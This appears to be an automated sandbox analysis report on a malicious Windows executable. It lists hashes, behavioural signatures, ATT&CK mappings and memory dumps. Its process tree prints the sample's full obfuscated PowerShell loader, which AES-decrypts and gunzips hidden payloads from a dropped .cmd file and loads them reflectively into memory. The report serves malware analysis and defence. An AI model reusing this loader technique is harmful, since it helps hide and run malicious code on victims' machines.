fabd087044389ec6e9d7e11f59687c9527e0aec25a83f8dae30da8404efe0e39

General

Target

file.exe
Size

5.3MB
MD5

6d075d047098d57266aa59b97d288bda
SHA1

1cb3eabf3ddbf47ea0f9eebac64b6689f7645cc1
SHA256

fabd087044389ec6e9d7e11f59687c9527e0aec25a83f8dae30da8404efe0e39
SHA512

9167cabbeca956b977d2ec2e88f8d1c03511d2271850df7e1d01e1b2fd76ac4534e782c236ad28fe92cee94b289a8c8ba74f1ec35b9028b70339adc4af3dfa69
SSDEEP

98304:+3G06n81vgUXP6+UXGLVk+3UXLtIhLuzXAapVgPrvqE3LDvuseWMeX:+3Gdn4oQP6L+3MLOJuzXXTgzP3ZeWF

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2696	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2696	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2172 wrote to memory of 3040	2172	file.exe	28
PID 2172 wrote to memory of 3040	2172	file.exe	28
PID 2172 wrote to memory of 3040	2172	file.exe	28
PID 3040 wrote to memory of 2548	3040	cmd.exe	30
PID 3040 wrote to memory of 2548	3040	cmd.exe	30
PID 3040 wrote to memory of 2548	3040	cmd.exe	30
PID 2548 wrote to memory of 2520	2548	cmd.exe	32
PID 2548 wrote to memory of 2520	2548	cmd.exe	32
PID 2548 wrote to memory of 2520	2548	cmd.exe	32
PID 2548 wrote to memory of 2696	2548	cmd.exe	33
PID 2548 wrote to memory of 2696	2548	cmd.exe	33
PID 2548 wrote to memory of 2696	2548	cmd.exe	33

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2172
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\mhk.cmd" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\mhk.cmd"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2548
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\mhk.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "
      4⤵
      PID:2520
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\mhk.cmd

Filesize
6.3MB

MD5
2abcb1711e177e29691ea8ee499e29f6

SHA1
308ee8f4af06199342075b17ea48fadc1734b636

SHA256
a89d5d1e3559f1ea719f642c1eba7a6f7c00b11473d02542c91f4578c0af54e9

SHA512
c8211787681dbd34a2d2d2b56f8d49f1daadd28cc13b6edd9ba2e57ca4c76c93fe9363419d09032d167085215eb8e8c85d7eb3515ab96ee3eb6a6a39702ebf82

Download Submit
memory/2696-20-0x000000001B270000-0x000000001B552000-memory.dmp

Filesize
2.9MB

Download
memory/2696-21-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-22-0x0000000002800000-0x0000000002880000-memory.dmp

Filesize
512KB

Download
memory/2696-23-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-24-0x0000000002610000-0x0000000002618000-memory.dmp

Filesize
32KB

Download
memory/2696-25-0x0000000002800000-0x0000000002880000-memory.dmp

Filesize
512KB

Download
memory/2696-26-0x0000000002800000-0x0000000002880000-memory.dmp

Filesize
512KB

Download
memory/2696-27-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-28-0x0000000002800000-0x0000000002880000-memory.dmp

Filesize
512KB

Download
memory/2696-29-0x0000000002800000-0x0000000002880000-memory.dmp

Filesize
512KB

Download
memory/2696-30-0x0000000002800000-0x0000000002880000-memory.dmp

Filesize
512KB

Download
memory/2696-31-0x0000000002800000-0x0000000002880000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing